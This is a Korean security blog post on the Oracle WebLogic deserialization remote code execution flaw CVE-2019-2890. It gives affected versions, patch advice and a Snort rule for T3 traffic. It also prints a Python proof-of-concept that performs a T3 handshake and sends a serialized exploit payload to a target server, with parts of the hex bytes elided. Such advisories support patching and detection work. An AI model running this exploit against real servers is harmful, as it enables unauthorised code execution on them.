티스토리 뷰
[CVE 취약점] Oracle Weblogic 원격코드 실행 취약점(CVE-2019-2890)
참조
> https://github.com/SukaraLin/CVE-2019-2890
> https://www.youtube.com/watch?v=qml-UJzNn6k
> https://github.com/ZO1RO/CVE-2019-2890/blob/master/CVE-2019-2890.py
Poc
#!/usr/bin/python import socket import os import sys import struct if len(sys.argv) < 3: print 'Usage: python %s ' % os.path.basename(sys.argv[0]) sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] Connecting to %s port %s' % server_address sock.connect(server_address) # Send headers headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' print 'sending "%s"' % headers sock.sendall(headers) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data payloadObj = open(sys.argv[3],'rb').read() payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43 중간생략\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78 payload=payload+payloadObj payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d 중간생략 x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63 # adjust header for appropriate message length payload=struct.pack('>I',len(payload)) + payload[4:] print '[+] Sending payload...' sock.send(payload) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data
|
개요
Oracle社 WebLogic Server의 취약점을 해결한 보안 업데이트 발표
취약점을 악용하는 공격코드가 인터넷에 공개되어 있어 적극적인 보안 업데이트 필요
WebLogic Server에서 안전하지 않은 역직렬화로 인해 발생하는 인증 우회 및 원격코드 실행 취약점(CVE-2019-2890)
영향 받는 제품 버전
WebLogic Server
- 10.3.6.0.0
- 12.1.3.0.0
- 12.2.1.3.0
방안
오라클 사 홈페이지(https://support.oracle.com/rs?type=doc&id=2568292.1)를 참고하여 최신 버전으로 업데이트 적용
PoC 실행 결과 취약점을 이용하기 위해서는 t3handshake Packet이 먼저 발생
- T3는 WebLogic 서버와 다른 유형의 Java 프로그램간에 정보를 전송하는 데 사용되는 프로토콜
- 관련 취약점(CVE-2018-2893) 과 영향받는 버전이 동일함(WebLogic Server(10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3)
Snort
alert tcp any any -> any any (sid:1; gid:1; content:"t3"; nocase; depth:2; content:"AS"; nocase; distance:7; within:5; content:"HL"; nocase; distance:4; within:5; content:"MS"; nocase; distance:3; within:5; msg:"Oracle Weblogic T3 Protocol(CVE-2018-2893)";) |
'CVE 취약점' 카테고리의 다른 글
[CVE 취약점] Django 제품 SQL Injection 취약점(CVE-2020-9402) (0) | 2020.11.01 |
---|---|
[CVE 취약점] MS SMBv3 프로토콜 취약점(CVE-2020-0796) (0) | 2020.11.01 |
[CVE 취약점] Citrix ADC/Gateway 제품 원격코드 실행 취약점(CVE-2019-19781) (0) | 2020.10.31 |
[CVE 취약점] vBulletin 원격 코드 실행 취약점(CVE-2019-16759) (0) | 2020.10.31 |
[CVE 취약점] Apache Solr 원격 코드 실행 취약점 관련 (0) | 2020.10.30 |
- Total
- Today